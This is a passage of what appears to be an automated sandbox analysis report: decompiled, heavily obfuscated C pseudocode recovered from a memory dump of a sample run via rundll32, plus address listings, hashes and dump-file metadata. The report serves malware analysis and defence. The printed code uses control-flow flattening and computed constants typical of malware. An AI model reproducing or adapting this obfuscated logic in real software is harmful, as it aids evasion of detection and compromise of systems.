                                                                                                                      				 *(_t489 + 0x94) =  *(_t489 + 0x94) ^ 0x000f202b;
                                                                                                                      				 *(_t489 + 0x14) = 0xa6bc3b;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0xdd735814;
                                                                                                                      				_t482 = 0x17;
                                                                                                                      				_t468 =  *(_t489 + 0x7c);
                                                                                                                      				 *(_t489 + 0x10) =  *(_t489 + 0x14) / _t482;
                                                                                                                      				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd88d4109;
                                                                                                                      				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd12bee16;
                                                                                                                      				 *(_t489 + 0x3c) = 0xc5a0fe;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0x68fedc8a;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) + 0xffff2d8b;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) << 2;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0xa0e5a913;
                                                                                                                      				_t418 =  *(_t489 + 0x7c);
                                                                                                                      				_t483 =  *(_t489 + 0x7c);
                                                                                                                      				 *(_t489 + 0x88) = 0x6bfd68;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) + 0xb2a;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x0062c11e;
                                                                                                                      				 *(_t489 + 0x44) = 0xc29f93;
                                                                                                                      				 *(_t489 + 0x44) =  *(_t489 + 0x44) >> 3;
                                                                                                                      				 *(_t489 + 0x44) =  *(_t489 + 0x44) << 1;
                                                                                                                      				 *(_t489 + 0x44) =  *(_t489 + 0x44) ^ 0x0034c9e7;
                                                                                                                      				 *(_t489 + 0x34) = 0x1f0cbd;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) + 0x9a3;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0x409d3612;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xb603e22c;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xf682cf9d;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t393 = 0x26766da;
                                                                                                                      					L2:
                                                                                                                      					while(_t420 != 0x1be807e) {
                                                                                                                      						if(_t420 == _t393) {
                                                                                                                      							_t395 = E002B57CE( *((intOrPtr*)(_t489 + 0xcc)),  *((intOrPtr*)(_t489 + 0xd0)),  *(_t489 + 0x50), _t418, _t483, _t468, _t420,  *(_t489 + 0x6c),  *(_t489 + 0x60), _t420,  *(_t489 + 0x4c), _t489 + 0xb8, _t420,  *(_t489 + 0x60));
                                                                                                                      							_t489 = _t489 + 0x30;
                                                                                                                      							__eflags = _t395;
                                                                                                                      							if(_t395 == 0) {
                                                                                                                      								_t396 =  *(_t489 + 0xa4);
                                                                                                                      							} else {
                                                                                                                      								_t485 = _t468;
                                                                                                                      								while(1) {
                                                                                                                      									__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
                                                                                                                      									if( *((intOrPtr*)(_t485 + 4)) != 4) {
                                                                                                                      										goto L18;
                                                                                                                      									}
                                                                                                                      									L17:
                                                                                                                      									_t349 = _t485 + 0xc; // 0x11e18
                                                                                                                      									_t401 = E002CFC96( *(_t489 + 0x34),  *(_t489 + 0x8c), _t487,  *(_t489 + 0x60), _t349);
                                                                                                                      									_t489 = _t489 + 0xc;
                                                                                                                      									__eflags = _t401;
                                                                                                                      									if(_t401 == 0) {
                                                                                                                      										_t396 = 1;
                                                                                                                      										 *(_t489 + 0xa4) = 1;
                                                                                                                      									} else {
                                                                                                                      										goto L18;
                                                                                                                      									}
                                                                                                                      									L23:
                                                                                                                      									_t483 =  *(_t489 + 0x7c);
                                                                                                                      									goto L24;
                                                                                                                      									L18:
                                                                                                                      									_t399 =  *_t485;
                                                                                                                      									__eflags = _t399;
                                                                                                                      									if(_t399 == 0) {
                                                                                                                      										_t396 =  *(_t489 + 0xa4);
                                                                                                                      									} else {
                                                                                                                      										_t485 = _t485 + _t399;
                                                                                                                      										__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
                                                                                                                      										if( *((intOrPtr*)(_t485 + 4)) != 4) {
                                                                                                                      											goto L18;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									goto L23;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L24:
                                                                                                                      							__eflags = _t396;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t393 = 0x26766da;
                                                                                                                      								_t420 = 0x26766da;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								_t464 =  *0x2d5208; // 0x0
                                                                                                                      								E002B7519( *(_t489 + 0x70),  *_t464,  *((intOrPtr*)(_t489 + 0x64)));
                                                                                                                      								_t420 = 0xa9f14cf;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							L32:
                                                                                                                      						} else {
                                                                                                                      							if(_t420 == 0x7d55797) {
                                                                                                                      								_t334 = _t489 + 0x28; // 0x6f6c7a54
                                                                                                                      								E002D12A8(_t420,  *_t334, __eflags,  *(_t489 + 0x60),  *((intOrPtr*)(_t489 + 0x18)), _t489 + 0xb8);
                                                                                                                      								_t405 = E002C4FA8( *((intOrPtr*)(_t489 + 0xac)), _t489 + 0xc8,  *((intOrPtr*)(_t489 + 0x9c)),  *(_t489 + 0x7c));
                                                                                                                      								_t487 = _t405;
                                                                                                                      								_t489 = _t489 + 0x14;
                                                                                                                      								_t420 = 0xe18b597;
                                                                                                                      								 *((short*)(_t405 - 2)) = 0;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t393 = 0x26766da;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t420 == 0x9eda0b2) {
                                                                                                                      									E002C4DAD( *(_t489 + 0x44),  *((intOrPtr*)(_t489 + 0x90)), _t418,  *(_t489 + 0x48),  *(_t489 + 0x34));
                                                                                                                      								} else {
                                                                                                                      									if(_t420 == 0xa9f14cf) {
                                                                                                                      										E002B68DE( *((intOrPtr*)(_t489 + 0x74)),  *(_t489 + 0x5c),  *(_t489 + 0x98),  *(_t489 + 0x14), _t468);
                                                                                                                      										_t489 = _t489 + 0xc;
                                                                                                                      										_t420 = 0x9eda0b2;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t393 = 0x26766da;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t420 == 0xacf19b8) {
                                                                                                                      											_t483 = 0x1000;
                                                                                                                      											_push(_t420);
                                                                                                                      											_push(_t420);
                                                                                                                      											 *(_t489 + 0x84) = 0x1000;
                                                                                                                      											_t468 = E002C3512(0x1000);
                                                                                                                      											_t393 = 0x26766da;
                                                                                                                      											__eflags = _t468;
                                                                                                                      											_t420 =  !=  ? 0x26766da : 0x9eda0b2;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t420 != 0xe18b597) {
                                                                                                                      												L28:
                                                                                                                      												__eflags = _t420 - 0x5473740;
                                                                                                                      												if(__eflags != 0) {
                                                                                                                      													continue;
                                                                                                                      												} else {
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												_t416 = E002CE938(0x2000000, 1,  *(_t489 + 0x44),  *(_t489 + 0x58),  *(_t489 + 0x94), _t420,  *(_t489 + 0x5c),  *((intOrPtr*)(_t489 + 0x90)), _t420,  *(_t489 + 0x20),  *(_t489 + 0x2c) | 0x00000006, _t489 + 0xb8);
                                                                                                                      												_t418 = _t416;
                                                                                                                      												_t489 = _t489 + 0x28;
                                                                                                                      												if(_t416 != 0xffffffff) {
                                                                                                                      													_t420 = 0xacf19b8;
                                                                                                                      													while(1) {
                                                                                                                      														L1:
                                                                                                                      														_t393 = 0x26766da;
                                                                                                                      														goto L2;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						__eflags = 0;
                                                                                                                      						return 0;
                                                                                                                      						goto L32;
                                                                                                                      					}
                                                                                                                      					_t420 = 0x7d55797;
                                                                                                                      					goto L28;
                                                                                                                      				}
                                                                                                                      			}




























                                                                                                                      0x002c9b5b
                                                                                                                      0x002c9b63
                                                                                                                      0x002c9b68
                                                                                                                      0x002c9b70
                                                                                                                      0x002c9b78
                                                                                                                      0x002c9b80
                                                                                                                      0x002c9b88
                                                                                                                      0x002c9b92
                                                                                                                      0x002c9b9a
                                                                                                                      0x002c9baf
                                                                                                                      0x002c9bb2
                                                                                                                      0x002c9bb9
                                                                                                                      0x002c9bc4
                                                                                                                      0x002c9bcc
                                                                                                                      0x002c9bd4
                                                                                                                      0x002c9bdc
                                                                                                                      0x002c9be4
                                                                                                                      0x002c9bec
                                                                                                                      0x002c9bfc
                                                                                                                      0x002c9c04
                                                                                                                      0x002c9c09
                                                                                                                      0x002c9c0f
                                                                                                                      0x002c9c17
                                                                                                                      0x002c9c1f
                                                                                                                      0x002c9c27
                                                                                                                      0x002c9c30
                                                                                                                      0x002c9c35
                                                                                                                      0x002c9c3b
                                                                                                                      0x002c9c43
                                                                                                                      0x002c9c4e
                                                                                                                      0x002c9c59
                                                                                                                      0x002c9c64
                                                                                                                      0x002c9c6f
                                                                                                                      0x002c9c7a
                                                                                                                      0x002c9c85
                                                                                                                      0x002c9c90
                                                                                                                      0x002c9c9b
                                                                                                                      0x002c9ca6
                                                                                                                      0x002c9cae
                                                                                                                      0x002c9cb6
                                                                                                                      0x002c9cc3
                                                                                                                      0x002c9cc6
                                                                                                                      0x002c9cca
                                                                                                                      0x002c9cd2
                                                                                                                      0x002c9ce2
                                                                                                                      0x002c9ceb
                                                                                                                      0x002c9cee
                                                                                                                      0x002c9cf2
                                                                                                                      0x002c9cfa
                                                                                                                      0x002c9d0a
                                                                                                                      0x002c9d12
                                                                                                                      0x002c9d15
                                                                                                                      0x002c9d19
                                                                                                                      0x002c9d21
                                                                                                                      0x002c9d29
                                                                                                                      0x002c9d31
                                                                                                                      0x002c9d36
                                                                                                                      0x002c9d3e
                                                                                                                      0x002c9d46
                                                                                                                      0x002c9d53
                                                                                                                      0x002c9d5a
                                                                                                                      0x002c9d5f
                                                                                                                      0x002c9d65
                                                                                                                      0x002c9d6d
                                                                                                                      0x002c9d75
                                                                                                                      0x002c9d80
                                                                                                                      0x002c9d8b
                                                                                                                      0x002c9d96
                                                                                                                      0x002c9d9e
                                                                                                                      0x002c9da3
                                                                                                                      0x002c9da8
                                                                                                                      0x002c9db0
                                                                                                                      0x002c9db8
                                                                                                                      0x002c9dc0
                                                                                                                      0x002c9dc8
                                                                                                                      0x002c9dd0
                                                                                                                      0x002c9dd8
                                                                                                                      0x002c9ddd
                                                                                                                      0x002c9de5
                                                                                                                      0x002c9ded
                                                                                                                      0x002c9df5
                                                                                                                      0x002c9dfd
                                                                                                                      0x002c9e02
                                                                                                                      0x002c9e0a
                                                                                                                      0x002c9e12
                                                                                                                      0x002c9e1a
                                                                                                                      0x002c9e22
                                                                                                                      0x002c9e2a
                                                                                                                      0x002c9e35
                                                                                                                      0x002c9e3d
                                                                                                                      0x002c9e48
                                                                                                                      0x002c9e50
                                                                                                                      0x002c9e5c
                                                                                                                      0x002c9e5f
                                                                                                                      0x002c9e63
                                                                                                                      0x002c9e67
                                                                                                                      0x002c9e6f
                                                                                                                      0x002c9e77
                                                                                                                      0x002c9e7f
                                                                                                                      0x002c9e87
                                                                                                                      0x002c9e8f
                                                                                                                      0x002c9e94
                                                                                                                      0x002c9e9c
                                                                                                                      0x002c9ea0
                                                                                                                      0x002c9ea4
                                                                                                                      0x002c9eaf
                                                                                                                      0x002c9eba
                                                                                                                      0x002c9ec5
                                                                                                                      0x002c9ecd
                                                                                                                      0x002c9ed2
                                                                                                                      0x002c9ed6
                                                                                                                      0x002c9ede
                                                                                                                      0x002c9ee6
                                                                                                                      0x002c9eee
                                                                                                                      0x002c9ef6
                                                                                                                      0x002c9efe
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x00000000
                                                                                                                      0x002c9f0b
                                                                                                                      0x002c9f19
                                                                                                                      0x002ca08a
                                                                                                                      0x002ca08f
                                                                                                                      0x002ca092
                                                                                                                      0x002ca094
                                                                                                                      0x002ca0d4
                                                                                                                      0x002ca096
                                                                                                                      0x002ca096
                                                                                                                      0x002ca098
                                                                                                                      0x002ca098
                                                                                                                      0x002ca09c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca09e
                                                                                                                      0x002ca09e
                                                                                                                      0x002ca0b2
                                                                                                                      0x002ca0b7
                                                                                                                      0x002ca0ba
                                                                                                                      0x002ca0bc
                                                                                                                      0x002ca0ca
                                                                                                                      0x002ca0cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca0e4
                                                                                                                      0x002ca0e4
                                                                                                                      0x00000000
                                                                                                                      0x002ca0be
                                                                                                                      0x002ca0be
                                                                                                                      0x002ca0c0
                                                                                                                      0x002ca0c2
                                                                                                                      0x002ca0dd
                                                                                                                      0x002ca0c4
                                                                                                                      0x002ca0c4
                                                                                                                      0x002ca098
                                                                                                                      0x002ca09c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca09c
                                                                                                                      0x00000000
                                                                                                                      0x002ca0c2
                                                                                                                      0x002ca098
                                                                                                                      0x002ca0e8
                                                                                                                      0x002ca0e8
                                                                                                                      0x002ca0ea
                                                                                                                      0x002ca10c
                                                                                                                      0x002ca111
                                                                                                                      0x00000000
                                                                                                                      0x002ca0ec
                                                                                                                      0x002ca0f0
                                                                                                                      0x002ca0fc
                                                                                                                      0x002ca102
                                                                                                                      0x00000000
                                                                                                                      0x002ca102
                                                                                                                      0x00000000
                                                                                                                      0x002c9f1f
                                                                                                                      0x002c9f25
                                                                                                                      0x002ca01e
                                                                                                                      0x002ca022
                                                                                                                      0x002ca040
                                                                                                                      0x002ca045
                                                                                                                      0x002ca047
                                                                                                                      0x002ca04c
                                                                                                                      0x002ca051
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x00000000
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f2b
                                                                                                                      0x002c9f31
                                                                                                                      0x002ca13f
                                                                                                                      0x002c9f37
                                                                                                                      0x002c9f3d
                                                                                                                      0x002c9ffc
                                                                                                                      0x002ca001
                                                                                                                      0x002ca004
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x00000000
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f43
                                                                                                                      0x002c9f49
                                                                                                                      0x002c9fb3
                                                                                                                      0x002c9fc0
                                                                                                                      0x002c9fc1
                                                                                                                      0x002c9fc4
                                                                                                                      0x002c9fd1
                                                                                                                      0x002c9fd3
                                                                                                                      0x002c9fd9
                                                                                                                      0x002c9fe0
                                                                                                                      0x00000000
                                                                                                                      0x002c9f4b
                                                                                                                      0x002c9f51
                                                                                                                      0x002ca11d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M'5w$O=9$Oi$Tzlo$Tzlo$e6$pv$r.5$A$r!
                                                                                                                      • API String ID: 0-357391454
                                                                                                                      • Opcode ID: 61e5174887cf1c2e2e74ba63229157b8b076969a6486f877f4c29db02f6e36f9
                                                                                                                      • Instruction ID: b5c2cec407d205564b82ef3222c56083da1cc9e91094d727881080327fb8db98
                                                                                                                      • Opcode Fuzzy Hash: 61e5174887cf1c2e2e74ba63229157b8b076969a6486f877f4c29db02f6e36f9
                                                                                                                      • Instruction Fuzzy Hash: 2E1241715183819FD3A8CF25C58AA5BBBE1FBC4358F108A1DF2DA86260D7B48959CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E002B7B82(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v2080;
                                                                                                                      				char _v2600;
                                                                                                                      				signed int _v2604;
                                                                                                                      				signed int _v2608;
                                                                                                                      				signed int _v2612;
                                                                                                                      				signed int _v2616;
                                                                                                                      				signed int _v2620;
                                                                                                                      				signed int _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _v2776;
                                                                                                                      				signed int _t404;
                                                                                                                      				signed int _t421;
                                                                                                                      				signed int _t422;
                                                                                                                      				signed int _t423;
                                                                                                                      				signed int _t424;
                                                                                                                      				signed int _t425;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				signed int _t430;
                                                                                                                      				void* _t463;
                                                                                                                      				void* _t464;
                                                                                                                      				signed int* _t468;
                                                                                                                      
                                                                                                                      				_t468 =  &_v2776;
                                                                                                                      				_v2716 = 0x9827f0;
                                                                                                                      				_v2716 = _v2716 << 9;
                                                                                                                      				_v2716 = _v2716 >> 4;
                                                                                                                      				_v2716 = _v2716 ^ 0x0304fe29;
                                                                                                                      				_v2684 = 0x251356;
                                                                                                                      				_v2684 = _v2684 + 0x1e2;
                                                                                                                      				_v2684 = _v2684 | 0xda75bfb2;
                                                                                                                      				_v2684 = _v2684 ^ 0xda7428eb;
                                                                                                                      				_v2768 = 0x24e368;
                                                                                                                      				_v2768 = _v2768 ^ 0xd5a17b15;
                                                                                                                      				_v2768 = _v2768 << 7;
                                                                                                                      				_v2768 = _v2768 | 0xced33043;
                                                                                                                      				_v2768 = _v2768 ^ 0xced6ff80;
                                                                                                                      				_v2736 = 0xa2f196;
                                                                                                                      				_v2736 = _v2736 + 0x6d02;
                                                                                                                      				_v2736 = _v2736 << 8;
                                                                                                                      				_v2736 = _v2736 * 0x63;
                                                                                                                      				_t463 = __ecx;
                                                                                                                      				_v2736 = _v2736 ^ 0x2d971c6c;
                                                                                                                      				_t464 = 0x422d362;
                                                                                                                      				_v2760 = 0x391c44;
                                                                                                                      				_v2760 = _v2760 >> 0x10;
                                                                                                                      				_v2760 = _v2760 + 0xe88b;
                                                                                                                      				_v2760 = _v2760 + 0x506d;
                                                                                                                      				_v2760 = _v2760 ^ 0x00052d5d;
                                                                                                                      				_v2744 = 0x960a81;
                                                                                                                      				_t421 = 3;
                                                                                                                      				_v2744 = _v2744 * 0x47;
                                                                                                                      				_v2744 = _v2744 * 0x66;
                                                                                                                      				_v2744 = _v2744 + 0x35e4;
                                                                                                                      				_v2744 = _v2744 ^ 0x94845397;
                                                                                                                      				_v2604 = 0xe8b0f5;
                                                                                                                      				_v2604 = _v2604 + 0x9847;
                                                                                                                      				_v2604 = _v2604 ^ 0x00e1425b;
                                                                                                                      				_v2712 = 0x9aefe1;
                                                                                                                      				_v2712 = _v2712 + 0x2d7a;
                                                                                                                      				_v2712 = _v2712 | 0x79d44310;
                                                                                                                      				_v2712 = _v2712 ^ 0x79db8805;
                                                                                                                      				_v2728 = 0x1377c5;
                                                                                                                      				_v2728 = _v2728 | 0x6e97ff53;
                                                                                                                      				_v2728 = _v2728 + 0x22de;
                                                                                                                      				_v2728 = _v2728 ^ 0x6e9b6172;
                                                                                                                      				_v2752 = 0xb1335e;
                                                                                                                      				_v2752 = _v2752 ^ 0x2dbaf336;
                                                                                                                      				_v2752 = _v2752 / _t421;
                                                                                                                      				_v2752 = _v2752 ^ 0xfe92c193;
                                                                                                                      				_v2752 = _v2752 ^ 0xf19577cc;
                                                                                                                      				_v2660 = 0x2952e4;
                                                                                                                      				_v2660 = _v2660 | 0x79708fb3;
                                                                                                                      				_v2660 = _v2660 ^ 0x797ec65d;
                                                                                                                      				_v2680 = 0x48d1a6;
                                                                                                                      				_t422 = 0x34;
                                                                                                                      				_v2680 = _v2680 / _t422;
                                                                                                                      				_v2680 = _v2680 * 0x69;
                                                                                                                      				_v2680 = _v2680 ^ 0x0099bc36;
                                                                                                                      				_v2612 = 0xcdd72a;
                                                                                                                      				_v2612 = _v2612 * 0x50;
                                                                                                                      				_v2612 = _v2612 ^ 0x4054338c;
                                                                                                                      				_v2672 = 0x8e3222;
                                                                                                                      				_v2672 = _v2672 << 1;
                                                                                                                      				_v2672 = _v2672 ^ 0x0115b014;
                                                                                                                      				_v2772 = 0xea36ba;
                                                                                                                      				_v2772 = _v2772 + 0xffff2869;
                                                                                                                      				_v2772 = _v2772 >> 2;
                                                                                                                      				_v2772 = _v2772 ^ 0xcd7b9291;
                                                                                                                      				_v2772 = _v2772 ^ 0xcd4b3afc;
                                                                                                                      				_v2776 = 0x8f99fe;
                                                                                                                      				_v2776 = _v2776 + 0x5190;
                                                                                                                      				_v2776 = _v2776 + 0xffffc7d6;
                                                                                                                      				_v2776 = _v2776 ^ 0x0f761f96;
                                                                                                                      				_v2776 = _v2776 ^ 0x0ff50908;
                                                                                                                      				_v2652 = 0xb833cd;
                                                                                                                      				_t423 = 0x31;
                                                                                                                      				_v2652 = _v2652 * 0x75;
                                                                                                                      				_v2652 = _v2652 ^ 0x5422af3f;
                                                                                                                      				_v2620 = 0x8c6cc6;
                                                                                                                      				_v2620 = _v2620 + 0xffff9da6;
                                                                                                                      				_v2620 = _v2620 ^ 0x008df9f5;
                                                                                                                      				_v2688 = 0x40b504;
                                                                                                                      				_v2688 = _v2688 ^ 0xc3e337a5;
                                                                                                                      				_v2688 = _v2688 + 0x808c;
                                                                                                                      				_v2688 = _v2688 ^ 0xc3a77743;
                                                                                                                      				_v2704 = 0x4030d0;
                                                                                                                      				_v2704 = _v2704 | 0xd8d5f091;
                                                                                                                      				_v2704 = _v2704 ^ 0xb4a4ac2b;
                                                                                                                      				_v2704 = _v2704 ^ 0x6c7bdbfc;
                                                                                                                      				_v2644 = 0xafd4ef;
                                                                                                                      				_v2644 = _v2644 * 0x3b;
                                                                                                                      				_v2644 = _v2644 ^ 0x288fb790;
                                                                                                                      				_v2764 = 0x1d91e2;
                                                                                                                      				_v2764 = _v2764 | 0xd96eda72;
                                                                                                                      				_v2764 = _v2764 + 0xffffbbe3;
                                                                                                                      				_v2764 = _v2764 >> 0xc;
                                                                                                                      				_v2764 = _v2764 ^ 0x000d90f8;
                                                                                                                      				_v2696 = 0x4b7a41;
                                                                                                                      				_v2696 = _v2696 | 0xbfeeeeed;
                                                                                                                      				_v2696 = _v2696 ^ 0xbfe32e95;
                                                                                                                      				_v2708 = 0x8f6339;
                                                                                                                      				_v2708 = _v2708 | 0xa71a0417;
                                                                                                                      				_v2708 = _v2708 + 0xffff51d8;
                                                                                                                      				_v2708 = _v2708 ^ 0xa79b9aa8;
                                                                                                                      				_v2636 = 0x12e7d6;
                                                                                                                      				_v2636 = _v2636 * 0x21;
                                                                                                                      				_v2636 = _v2636 ^ 0x026e6de9;
                                                                                                                      				_v2756 = 0xd5c5d;
                                                                                                                      				_v2756 = _v2756 ^ 0x716456fc;
                                                                                                                      				_v2756 = _v2756 + 0xa334;
                                                                                                                      				_v2756 = _v2756 >> 0xc;
                                                                                                                      				_v2756 = _v2756 ^ 0x000918e1;
                                                                                                                      				_v2608 = 0xbb78a7;
                                                                                                                      				_v2608 = _v2608 + 0xd6b3;
                                                                                                                      				_v2608 = _v2608 ^ 0x00b2dabe;
                                                                                                                      				_v2668 = 0xad3636;
                                                                                                                      				_v2668 = _v2668 + 0xffffa01e;
                                                                                                                      				_v2668 = _v2668 ^ 0x00a02f3e;
                                                                                                                      				_v2628 = 0x4494fc;
                                                                                                                      				_v2628 = _v2628 / _t423;
                                                                                                                      				_v2628 = _v2628 ^ 0x0009fca5;
                                                                                                                      				_v2748 = 0x660e04;
                                                                                                                      				_v2748 = _v2748 + 0xffffa723;
                                                                                                                      				_v2748 = _v2748 | 0x67469fe4;
                                                                                                                      				_t424 = 0x4b;
                                                                                                                      				_v2748 = _v2748 * 5;
                                                                                                                      				_v2748 = _v2748 ^ 0x050bc0b3;
                                                                                                                      				_v2616 = 0xd4c89d;
                                                                                                                      				_v2616 = _v2616 << 7;
                                                                                                                      				_v2616 = _v2616 ^ 0x6a6fac0f;
                                                                                                                      				_v2700 = 0xaa08c8;
                                                                                                                      				_v2700 = _v2700 + 0xffffd108;
                                                                                                                      				_v2700 = _v2700 / _t424;
                                                                                                                      				_v2700 = _v2700 ^ 0x0001fda8;
                                                                                                                      				_v2732 = 0x67cb1c;
                                                                                                                      				_v2732 = _v2732 << 5;
                                                                                                                      				_v2732 = _v2732 | 0x2b3c2ffa;
                                                                                                                      				_v2732 = _v2732 ^ 0x295e7aa1;
                                                                                                                      				_v2732 = _v2732 ^ 0x06a01d44;
                                                                                                                      				_v2656 = 0xfaf065;
                                                                                                                      				_v2656 = _v2656 + 0xffff35fd;
                                                                                                                      				_v2656 = _v2656 ^ 0x00f58676;
                                                                                                                      				_v2740 = 0x2bd94;
                                                                                                                      				_v2740 = _v2740 + 0x3f47;
                                                                                                                      				_t425 = 0x2a;
                                                                                                                      				_v2740 = _v2740 / _t425;
                                                                                                                      				_v2740 = _v2740 ^ 0xca3749d7;
                                                                                                                      				_v2740 = _v2740 ^ 0xca3fc9be;
                                                                                                                      				_v2664 = 0x3942c4;
                                                                                                                      				_v2664 = _v2664 << 0xe;
                                                                                                                      				_v2664 = _v2664 ^ 0x50bf8d15;
                                                                                                                      				_v2724 = 0xb2ae33;
                                                                                                                      				_t426 = 0x22;
                                                                                                                      				_v2724 = _v2724 / _t426;
                                                                                                                      				_v2724 = _v2724 << 1;
                                                                                                                      				_v2724 = _v2724 ^ 0x6c628229;
                                                                                                                      				_v2724 = _v2724 ^ 0x6c6ae222;
                                                                                                                      				_v2640 = 0xd32362;
                                                                                                                      				_v2640 = _v2640 + 0xffff88f4;
                                                                                                                      				_v2640 = _v2640 ^ 0x00d4f71b;
                                                                                                                      				_v2648 = 0x3e5b4d;
                                                                                                                      				_v2648 = _v2648 + 0x4f8c;
                                                                                                                      				_v2648 = _v2648 ^ 0x003b681e;
                                                                                                                      				_v2676 = 0xc6bb8b;
                                                                                                                      				_v2676 = _v2676 << 4;
                                                                                                                      				_t427 = 0x14;
                                                                                                                      				_v2676 = _v2676 / _t427;
                                                                                                                      				_v2676 = _v2676 ^ 0x009ad4f5;
                                                                                                                      				_v2720 = 0xa3b34d;
                                                                                                                      				_v2720 = _v2720 + 0xffff97dd;
                                                                                                                      				_v2720 = _v2720 | 0x7136ebef;
                                                                                                                      				_v2720 = _v2720 ^ 0x71b8bb4e;
                                                                                                                      				_v2692 = 0xa7ff58;
                                                                                                                      				_t404 = _v2692 * 0x31;
                                                                                                                      				_v2692 = _t404;
                                                                                                                      				_v2692 = _v2692 >> 4;
                                                                                                                      				_v2692 = _v2692 ^ 0x020bdfc2;
                                                                                                                      				_v2624 = 0xa501ce;
                                                                                                                      				_v2624 = _v2624 | 0xdc20330f;
                                                                                                                      				_v2624 = _v2624 ^ 0xdca3e6f8;
                                                                                                                      				_v2632 = 0xa992b7;
                                                                                                                      				_v2632 = _v2632 | 0x4e4d69fe;
                                                                                                                      				_v2632 = _v2632 ^ 0x4ee71179;
                                                                                                                      				while(_t464 != 0x2953b22) {
                                                                                                                      					if(_t464 == 0x422d362) {
                                                                                                                      						_t464 = 0xe704baa;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t475 = _t464 - 0xe704baa;
                                                                                                                      						if(_t464 != 0xe704baa) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t464 - 0x740d40c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
